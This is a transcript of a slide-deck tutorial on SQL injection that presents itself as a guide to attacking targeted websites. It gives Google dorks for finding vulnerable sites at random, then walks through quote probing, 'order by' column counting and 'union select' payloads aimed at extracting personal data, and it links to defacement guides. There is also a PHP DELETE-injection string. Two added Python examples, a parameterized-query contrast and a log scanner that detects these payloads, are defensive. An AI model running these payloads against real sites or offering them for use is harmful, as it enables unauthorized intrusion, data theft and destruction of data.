sql injection - security testing

SQL Injection By Napendra Singh

Upload: napender-singh

Post on 16-Dec-2014

DESCRIPTION

This is my educational tutorial to let you know how to perform SQL Injection on a targeted website.

TRANSCRIPT

Page 1: Sql injection - security testing

SQL Injection

By Napendra Singh

Page 2: Sql injection - security testing

A SQL injection attack is exactly what the name suggests – it is where a hacker tries to “inject” his harmful/malicious SQL code into someone else’s database, and force that database to run his SQL. This could potentially ruin their database tables, and even extract valuable or private information from their database tables. The idea behind SQL injection is to have the application under attack run SQL that it was never supposed to run.

Page 3: Sql injection - security testing
Page 4: Sql injection - security testing

What can a hacker do with a SQL Injection attack?

- Bypassing logins
- Accessing secret data
- Modifying contents of the website
- Shutting down the MySQL server

Page 5: Sql injection - security testing

How SQL injection attack is carried out

In a SQL Injection attack, the attacker exploits a vulnerability created by the bad coding practice of the developer. Generally, SQL injection is largely observed with PHP and ASP applications. SQL Injection primarily originates from the input fields of a form on the website or web application.

Page 6: Sql injection - security testing

Input fields in the form are meant to accept the user information required for the application. We can never trust the users: some can be legitimate (like you) while some can have bad intentions (hackers). The hacker can execute queries from the input field of the web application. More severe queries like DELETE DATABASE can also get executed.

Page 7: Sql injection - security testing
Page 8: Sql injection - security testing

SQL Injection Example

Example 1

MySQL & PHP Code:

$name_evil = "'; DELETE FROM customers WHERE 1 or username = '";

// our MySQL query builder really should check for injection
$query_evil = "SELECT * FROM customers WHERE username = '$name_evil'";

// the new evil injection query would include a DELETE statement
echo "Injection: " . $query_evil;

Page 9: Sql injection - security testing

Display:

SELECT * FROM customers WHERE username = ' '; DELETE FROM customers WHERE 1 or username = ' '

If you were to run this query, then the injected DELETE statement would completely empty your "customers" table.
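The same lookup built both ways, as an added example that is not part of the original slides. It uses Python's sqlite3 in place of PHP and MySQL so it runs offline; executescript() stands in for a database driver that accepts several statements in one call, and the table rows and function names are constructed for the illustration.

```python
import sqlite3

# Payload copied from the tutorial's $name_evil.
NAME_EVIL = "'; DELETE FROM customers WHERE 1 or username = '"

def fresh_db():
    """In-memory table with constructed sample rows (not real data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE customers (username TEXT, email TEXT)")
    db.executemany(
        "INSERT INTO customers VALUES (?, ?)",
        [("alice", "alice@example.test"), ("bob", "bob@example.test")],
    )
    db.commit()
    return db

def row_count(db):
    return db.execute("SELECT COUNT(*) FROM customers").fetchone()[0]

def lookup_concatenated(db, name):
    """Vulnerable: the input is pasted into the SQL text, like $query_evil."""
    query = "SELECT * FROM customers WHERE username = '" + name + "'"
    db.executescript(query)  # assumption: driver runs stacked statements
    return query

def lookup_parameterized(db, name):
    """Hardened: the SQL text is fixed and the input is a bound value."""
    cur = db.execute(
        "SELECT username, email FROM customers WHERE username = ?", (name,)
    )
    return cur.fetchall()

def demo():
    vulnerable, hardened = fresh_db(), fresh_db()
    lookup_concatenated(vulnerable, NAME_EVIL)        # DELETE runs
    rows = lookup_parameterized(hardened, NAME_EVIL)  # payload is only a name
    return row_count(vulnerable), row_count(hardened), rows

if __name__ == "__main__":
    print(demo())
```

With the bound parameter the payload is compared as a literal username, matches nothing, and the table keeps both rows.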

Page 10: Sql injection - security testing

How to do SQL Injection

Page 11: Sql injection - security testing

Step 1: Finding Vulnerable Website:

To find a SQL Injection vulnerable site, you can use Google search by searching for certain keywords. These keywords are often referred to as 'Google dorks'.

Some Examples:

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Copy one of the above keywords and paste it into Google. Here, we will get a lot of search results with

We have to visit the websites one by one to check for the vulnerability.

Page 12: Sql injection - security testing

Step 2: Checking the Vulnerability:

Now let us check the vulnerability of the target website. To check the vulnerability, add a single quote (') at the end of the URL and hit enter.

For example:

http://www.victimsite.com/index.php?id=2'

If the page stays the same or shows that the page was not found, then it is not vulnerable.

If you get an error message like this, then it means that the site is vulnerable:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Page 13: Sql injection - security testing

Step 3: Finding Number of columns:

Great, we have found that the website is vulnerable to SQLi attack. Our next step is to find the number of columns present in the target database.

For that, replace the single quote (') with an "order by n" statement.

Change n through 1, 2, 3, 4, 5, 6, ... until you get an error like "unknown column".

http://www.victimsite.com/index.php?id=2 order by 1 (no error)
http://www.victimsite.com/index.php?id=2 order by 2 (no error)
http://www.victimsite.com/index.php?id=2 order by 3 (no error)
http://www.victimsite.com/index.php?id=2 order by 4 (no error)
http://www.victimsite.com/index.php?id=2 order by 5 (no error)
http://www.victimsite.com/index.php?id=2 order by 6 (no error)
http://www.victimsite.com/index.php?id=2 order by 7 (no error)
http://www.victimsite.com/index.php?id=2 order by 8 (error)

So now x=8. The number of columns is x-1, i.e. 7.

Page 14: Sql injection - security testing

In case the above method fails to work for you, try adding "--" at the end of the statement. For example:

http://www.victimsite.com/index.php?id=2 order by 1--

Page 15: Sql injection - security testing

Step 4: Find the Vulnerable columns:

We have successfully discovered the number of columns present in the target database. Let us find the vulnerable column by trying the query "union select columns_sequence".

Change the id value to negative (I mean id=-2). Replace columns_sequence with the numbers from 1 to x-1 (the number of columns), separated by commas (,).

For example, if the number of columns is 7, then the query is as follows:

http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If the above method is not working, then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--

Page 16: Sql injection - security testing

Once you execute the query, it will display the vulnerable column.

Bingo, columns '3' and '7' are found to be vulnerable. Let us take the first vulnerable column, '3'. We can inject our query in this column.

Page 17: Sql injection - security testing

At this point, you know what columns to direct your SQL queries at and you can begin exploiting the database. You will be relying on union select statements to perform most of the functions from this point forward.

The tutorial ends here. You have learned how to select a vulnerable website and detect which columns are responsive to your queries. The only thing left to do is append SQL commands to the URL. Some of the common functions you can perform at this point include getting a list of the databases available, getting the current user, getting the tables, and ultimately, the columns within these tables. The columns are where all of the personal information is stored.
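The requests described in Steps 2 to 4 leave a recognizable trail in a web server's access log. The following is an added example, not part of the original slides, of a scanner that flags that trail; the log lines are constructed samples, and the rule names and functions are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache-style access log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [16/Dec/2014:10:00:01 +0000] "GET /index.php?id=2 HTTP/1.1" 200 5120
203.0.113.9 - - [16/Dec/2014:10:00:07 +0000] "GET /index.php?id=2%27 HTTP/1.1" 500 310
203.0.113.9 - - [16/Dec/2014:10:00:15 +0000] "GET /index.php?id=2%20order%20by%208-- HTTP/1.1" 500 298
203.0.113.9 - - [16/Dec/2014:10:00:31 +0000] "GET /index.php?id=-2+union+select+1,2,3,4,5,6,7-- HTTP/1.1" 200 5340
198.51.100.4 - - [16/Dec/2014:10:01:02 +0000] "GET /article.php?id=order-by-mail HTTP/1.1" 200 4100
"""

# One rule per step of the tutorial, applied to the URL-decoded parameter value.
RULES = [
    ("quote_probe", re.compile(r"^-?\d+\s*'")),                    # Step 2
    ("order_by_enum", re.compile(r"\border\s+by\s+\d+", re.I)),    # Step 3
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),  # Step 4
    ("comment_tail", re.compile(r"--\s*$")),                       # trailing "--"
]

LINE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def scan(log_text):
    """Return (client, parameter, decoded value, status, matched rules) tuples."""
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        # parse_qsl decodes %27, %20 and '+' so the rules see the real value.
        for param, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            hits = [name for name, rx in RULES if rx.search(value)]
            if hits:
                findings.append((ip, param, value, int(status), hits))
    return findings

def noisy_clients(findings, threshold=2):
    """Clients with at least `threshold` flagged requests."""
    counts = {}
    for ip, *_ in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A run of flagged requests from one client, especially one that mixes HTTP 500 responses with a final 200, is the sequence worth alerting on.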

Page 18: Sql injection - security testing

Want to take a deep dive? Access these URLs:

http://www.explorehacking.com/2011/01/sql-injection-step-by-step-deface.html

http://www.breakthesecurity.com/2010/12/hacking-website-using-sql-injection.html

Page 20: Sql injection - security testing

Thank You